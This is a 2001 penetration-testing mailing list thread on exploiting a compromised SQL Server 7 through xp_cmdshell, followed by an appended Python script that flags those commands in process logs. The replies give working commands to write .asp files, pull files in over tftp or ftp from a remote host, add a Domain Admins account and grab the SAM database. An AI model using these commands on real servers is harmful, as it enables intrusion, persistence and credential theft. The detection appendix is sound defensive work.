Penetration Testing mailing list archives
Re: [PEN-TEST] Hacking a server through SQL SERVER 7
From: MadHat <madhat () UNSPECIFIC COM>
Date: Thu, 25 Jan 2001 14:25:41 -0600
At 01:40 PM 1/25/2001 -0500, you wrote:
If I understand your question, try:

    xp_cmdshell 'echo filecontent > c:\file.asp'

This will create a file named 'file.asp', with the text 'filecontent' in it.

If UDP port 69 is open, you can use tftp easily

    xp_cmdshell 'tftp remotehost get file.asp c:\destination_file.asp'

Or if you can FTP from inside, you can use FTP to grab files off of other servers from the SQL server with an ftp script. It has been a while since I played with this, so the syntax may be a little off, but basically

    xp_cmdshell 'echo user > script.file; echo pass >> script.file; echo bin >> script.file; echo get file.asp >> script.file; echo quit>>script.file; ftp -s:script.file remotehost'

The script file is line by line what will be sent to the ftp once the connection is made, if I am not mistaken, so you need the user, the pass and whatever commands you would use... like

    anonymous
    user () here com
    ascii
    get file.asp c:\des_file.asp
    quit

So though you can't FTP in, you might be able to FTP out.

Aaron C. Newman

> -----Original Message-----
> From: Penetration Testers [mailto:PEN-TEST () SECURITYFOCUS COM]On Behalf Of FiC
> Sent: Thursday, January 25, 2001 4:33 AM
> To: PEN-TEST () SECURITYFOCUS COM
> Subject: Re: [PEN-TEST] Hacking a server through SQL SERVER 7
>
> Thank you all for your valuable information.
>
> Is there any way to upload/create a file in the hacked SQL SERVER through the
> system commands? I think that the machine is behind a Firewall and even if I
> start the FTP service I can't connect via ftp, and the port 139 is not open
> or it's filtered. I've tried to create an .asp file with the "copy con"
> command, but I can't do it through the SQL console. How can I upload/create
> an .asp file to this server?
>
> Thanx.
>
> > Once you have access to a MSSQL 7 server via the "sa" account, you can do
> > all sorts of fun things:
> >
> > Run system commands:
> >
> > EXEC [master].[dbo].[xp_cmdshell] "net user newuser newpass /ADD /DOMAIN"
> > EXEC [master].[dbo].[xp_cmdshell] "net group 'Domain Admins' newuser /ADD /DOMAIN"
> >
> > You can also access the registry, send email, dump system information...
> > Take a look at some of the Extended Stored Procedures in the [master]
> > database with SQL Query Analyzer. Depending on the user the server runs at
> > (normally SYSTEM or Administrator), you can usually use xp_cmdshell to
> > rebuild the repair disk data with rdisk /s and snag the SAM database.
> >
> > I will be giving a presentation at the upcoming CanSecWest conference
> > covering a variety of SQL server attacks, everything from general procedure
> > exploitation to insertion techniques. At the conference, I will be
> > releasing a handful of new tools, one of which exploits the RDS component
> > in new ways, allowing access to SQL servers as well as proxying requests to
> > internal systems through it. For more information on the conference,
> > please see http://www.cansecwest.com, online registration should be
> > available within a few weeks.
>
> --
> ~/ FiC /~

-- MadHat at unspecific.com
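
A defender's view of the commands in this message, as an added example that is not part of the original post: xp_cmdshell runs its argument through cmd.exe as a child of sqlservr.exe, so process-creation logs can be triaged for that parentage plus the file-write and outbound-transfer commands mentioned above. The event field names, install paths, `backuphost` and the sample events are constructed for illustration.

```python
import re

# Command-line patterns for the three techniques named in the message above.
RULES = [
    ("echo redirected into a web script",
     re.compile(r"\becho\b.*>{1,2}\s*\S+\.(asp|aspx|php|jsp)\b", re.I)),
    ("tftp download", re.compile(r"\btftp(\.exe)?\b.*\bget\b", re.I)),
    ("ftp driven by a script file", re.compile(r"\bftp(\.exe)?\b.*\s-s:\S+", re.I)),
]
GENERIC = "sqlservr.exe spawned cmd.exe"

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def is_sql_shell(event):
    """xp_cmdshell runs its argument via cmd.exe as a child of sqlservr.exe."""
    return (basename(event["parent_image"]) == "sqlservr.exe"
            and basename(event["image"]) == "cmd.exe")

def triage(events):
    """Return (command_line, [rule names]) for every SQL-Server-spawned shell."""
    findings = []
    for event in events:
        if not is_sql_shell(event):
            continue  # the same commands from other parents are out of scope here
        hits = [name for name, rx in RULES if rx.search(event["command_line"])]
        findings.append((event["command_line"], hits or [GENERIC]))
    return findings

# Constructed sample events (field names and paths are assumptions, not a real log schema).
SQLSERVR = r"C:\MSSQL7\Binn\sqlservr.exe"
CMD = r"C:\WINNT\system32\cmd.exe"

def make_event(parent, command_line):
    return {"parent_image": parent, "image": CMD, "command_line": command_line}

SAMPLE_EVENTS = [
    make_event(SQLSERVR, r"cmd.exe /c echo filecontent > c:\file.asp"),
    make_event(SQLSERVR, r"cmd.exe /c tftp remotehost get file.asp c:\destination_file.asp"),
    make_event(SQLSERVR, "cmd.exe /c ftp -s:script.file remotehost"),
    make_event(SQLSERVR, "cmd.exe /c ver"),
    make_event(r"C:\WINNT\explorer.exe", "cmd.exe /c ftp -s:nightly.txt backuphost"),
]

if __name__ == "__main__":
    for command_line, hits in triage(SAMPLE_EVENTS):
        print(f"{', '.join(hits):35} {command_line}")
```

Any cmd.exe child of sqlservr.exe is reported, with the generic label when no specific rule matches, since a database engine spawning a shell is worth a look on its own.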